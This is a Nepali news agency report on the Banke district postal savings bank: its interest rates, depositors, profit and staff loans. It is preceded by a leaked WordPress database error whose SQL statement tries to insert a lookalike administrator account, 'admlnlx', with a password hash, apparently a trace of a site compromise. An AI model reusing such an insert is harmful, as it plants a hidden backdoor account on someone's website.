WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmykfj4hBv1VR.2pia2ZJ4d3vHSRNH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 03:37:43', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ ७ –
थोर थोरै रकम जम्मा गर्न सकिने तथा राम्रो ब्याजदर प्राप्त हुने भएपछि बाँकेमा सञ्चालित हुलाक बचत बैंकप्रति सेवाग्राहीको आकर्षण बढ्दै गएको छ ।
जिल्ला हुलाक कार्यालयद्वारा सञ्चालित सो बैंकले ७० वर्षभन्दा माथिका ज्येष्ठ नागरिक बचतकर्तालाई चार प्रतिशत ब्याज उपलब्ध गराउँदै आएको छ । विसं २०६३ असोजदेखि सञ्चालनमा ल्याइएको सो बैंकमा गत मङ्सिरसम्म एक हजार ६६७ बचतकर्ता रहेका जिल्ला हुलाक कार्यालयका प्रमुख पुष्पराज श्रेष्ठले बताउनुभयो ।
‘हुलाक बचत बैंकमा खाता खोलौँ, बचत गर्ने बानी बसालौँ’ नारा रहेको सो बैंकमा रु १०० देखि रु १० लाखसम्मको खाता खोल्न पाउने व्यवस्था गरिएको छ । बैंकले साधारणतर्पm तीन र ज्येष्ठ नागरिक बचत खातामा चार प्रतिशत ब्याज उपलब्ध गराउँदै आएको छ । हुलाकका कर्मचारीले अनिवार्य खाता खोल्नुपर्ने जनाइएको छ ।
सो बंैकले यस वर्षको मङ्सिर मसान्तसम्म रु ९६ लाख मुनाफा आर्जन गरेको छ भने निक्षेप सङ्कलन रु आठ करोड ७४ लाख पु¥याएको छ । बैंकमा खाता खोल्नेको सङ्ख्या सहरको भन्दा ग्रामीण भेगका नागरिकको बढी छ । सो बैंकले हुलाकअन्तर्गतका कर्मचारीलाई आठ प्रतिशत ब्याजदरमा रु एक करोड ३७ लाख ऋण लगानी गरेको कर्मचारी साधुराम चौधरीले जानकारी दिनुभयो । – रासस